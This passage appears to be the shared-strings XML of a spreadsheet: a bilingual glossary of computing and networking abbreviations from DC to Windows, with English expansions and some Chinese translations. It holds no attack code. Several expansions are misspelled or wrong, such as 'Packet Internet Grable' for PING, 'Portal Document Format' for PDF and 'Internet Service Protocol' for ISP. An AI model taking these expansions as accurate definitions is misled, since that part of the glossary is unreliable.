    <t>数模转换器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Digital Camera</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC-AC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Direct current-Alternate Current Inverter</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DDL</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dynamic Link Library</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DDN</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Digita Data Network</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DDRSDRAM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Double Data Rate Synchronous Random Access Memory</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>双倍速同步动态随机存取内存</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DHCP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dynamic Host Configuration Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DIMM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dual Inline Memory Module</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>双列直插内存模块</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DIY</t>
  </si>
  <si>
    <t>Do It Yourself</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>自己动手</t>
  </si>
  <si>
    <t>DMB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Digital Multimedia Broadcasting</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数字多媒体广播</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DNS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Domain Name Service/System</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DOS</t>
  </si>
  <si>
    <t>Disc Operating System</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>磁盘操作系统</t>
  </si>
  <si>
    <t>DPI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dots Per Inch</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>每英寸点数</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Digital Video</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Digital video disc</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Digital Visual Interface</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数字视频接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>EEPROM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Electrially Erasable Programmable ROM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>E-mail</t>
  </si>
  <si>
    <t xml:space="preserve">Electronic mail </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电子邮件</t>
  </si>
  <si>
    <t>EMS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Electronic Mail System</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FAT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>File Allocation Table</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FDDI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Fibre Distributed Data Interface</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FLV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Flash Video</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FSB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Front Side Bus</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FTP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>File Transfer Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GIF</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Graphics Interchange Format</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GPRS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>General Packet Radio Service</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GPS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Global positioning System</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GPU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Graphic Processing Unit</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GSM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Global System for Mobile Communication</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>全球通</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HDD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hard Disc Driver</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HDTV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>High Definition TV</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HTML</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hyper Text Markup Language</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HTTP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hyper Text Transfer Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IC</t>
  </si>
  <si>
    <t>Integrated Circuit</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>集成电路</t>
  </si>
  <si>
    <t>ICMP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Internet Control and Message Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ICP</t>
  </si>
  <si>
    <t>Internet Content Provider</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>互联网内容供应商</t>
  </si>
  <si>
    <t>ICS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Internet connect service</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IDE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Integrated Driver Electronics</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>集成电子驱动器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电子集成驱动器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IDS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Instrusion Detection System</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>入侵检测系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IEEE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Institute of Electrical and Electronic Engineer</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电子电气工程师协会</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IIS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Internet Information Serivce</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Instant Message</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IMAP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Internet message Access Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>报文存取协议</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Internet Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IPS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Instrustion Prevention System</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>防御入侵系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IPX/SPX</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Internetwork packet eXchange/Sequences Packet eXchange</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网际包交换\顺序包交换协议集</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IrDA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Infrared Data Association</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红外线通信接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ISA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Industry Standard Architecture</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ISDN</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Integrated Service Data Network</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ISP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Internet Service Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IT</t>
  </si>
  <si>
    <t xml:space="preserve">InformationTechnology </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>信息技术</t>
  </si>
  <si>
    <t>JPEG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Joint Photographic Expert Group</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一个静态图压缩标准</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>L2 Cache</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Level 2 Cache</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>二级缓存</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAN</t>
  </si>
  <si>
    <t xml:space="preserve">LocalArea Network </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>局域网</t>
  </si>
  <si>
    <t>LCD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Liguid Crystal Display</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LD</t>
  </si>
  <si>
    <t>Laser Disc</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>激光唱盘</t>
  </si>
  <si>
    <t>LED</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Light Emitting Diode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>发光二极管</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MAC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Medium Access Control</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MAN</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Metropolitan Area Network</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MBR</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Master Boot Record</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MIDI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Musical Instrument Digital Interface</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>乐器数字接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MIME</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Multipurpose Internet Mail Extension</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>多用途Internet邮件扩展协议</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MMS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Multimedia Message Sevice</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MP3</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MPEG Audio Layer3</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MPEG</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Moving Picture Expert Group</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>动态图像专家</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NetBEUI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Net BIOS Extended User Interface</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NIC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Network Interface Card</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Network Interface Center</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NTFS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>New Technology File System</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>OCR</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Optical Character Recognition  </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光学字符识别</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>OEM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">OriginalEquipment Manufacturer   </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>原始设备制造商</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>OLE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">ObjectLinking and Embedding  </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对象连接与嵌入，简称OLE技术</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>OOP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Object Oriented Programming</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>面向对象的程序设计</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>OSI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Open System Internection</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>OU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Organization Unit</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>P2P</t>
  </si>
  <si>
    <t>Peerto Peer</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对等联网</t>
  </si>
  <si>
    <t>PAT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Port Address Translation</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>端口多路复用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>personal/Portal/Palm Computor</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PCI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Peripheral component Interconnection</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>互联外围设备</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PCMIC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Personal computor Memory Card Association</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PDA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Personal Digital Assistant</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PDF</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Portal Document Format</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可移植文档格式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Preinstallation Environment</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>预安装环境</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mini操作系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PHP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hypertext Proprocessor</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>超文本预处理器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PING</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Packet Internet Grable</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PNP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Plug and Play</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>POP3</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Post Office Protocol Version 3</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>POST</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Power On Self Test</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PPPOE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Point to Point Protocol Over Ethernet</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PSP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Play Station Portable</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>便携式娱乐平台</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RAID</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Redundant Array of Independent Disk</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>冗余独立磁盘阵列</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RFI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Radio Frequency Interface</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无线射频接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RJ-45</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Registered Jack</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册的插座</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Real Media</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ROM</t>
  </si>
  <si>
    <t xml:space="preserve">Read-Only Memory </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>只读存储器</t>
  </si>
  <si>
    <t>RSS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rich Site Summary</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>丰富站点摘要</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Really Simple Syndication</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>真正简单整合</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RTP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Realtime Transport Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>实时传输协议</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RTSP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Realtime Streaming Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>实时流媒体协议</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SAP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Service Access Point</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Serivce Advertising Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SAS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Serial Attached SCSI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SATA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Serial ATA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SCSI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Small Computor System Interface</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SET</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Secure Electronic Transaction</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安全电子交易</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SIM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Subscriber Identity Modual</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SMS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Short Message Service</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SMTP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Simple Mail Transfer Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SOAP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">SimpleOpen Access Protocol  </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>简单对象访问协议</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SOHO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">SmallOffice Home Office  </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在家办公</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Serivce Pack</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SQL</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Structred Query Language</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>结构化查询语言</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SSID</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Service Set Identity</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TCP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Transmission control protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>传输控制协议</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TIFF</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Tagged Image File Format</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UAC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>User Account Control</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用户帐户控制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UDP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>User Datagram protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用户数据报协议</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用于实时通信;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UMS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Unified M essaging Service</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>统一消息服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UPS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Uninterruptible Power Supply</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>URL</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Uniform Resource Locator</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>USB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Universal Serial Bus</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Visual Basci</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ffice Word内的VBA(ALT+F11),只能Office文档内运行,称为宏,可以使Office文档更加智能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VCD</t>
  </si>
  <si>
    <t>Video Compact Disc</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>激光视盘</t>
  </si>
  <si>
    <t>VGA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Video Graphic Adaptor</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>视频图形适配器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Video Graphic Array</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>视频图形阵列</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VLAN</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Virtual Local Area Network</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VPN</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Virtual Private Network</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WAN</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WideArea Network</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>广域网</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WAP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Wireless Application Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Wi-Fi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Wireless Fidelity</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Windows</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
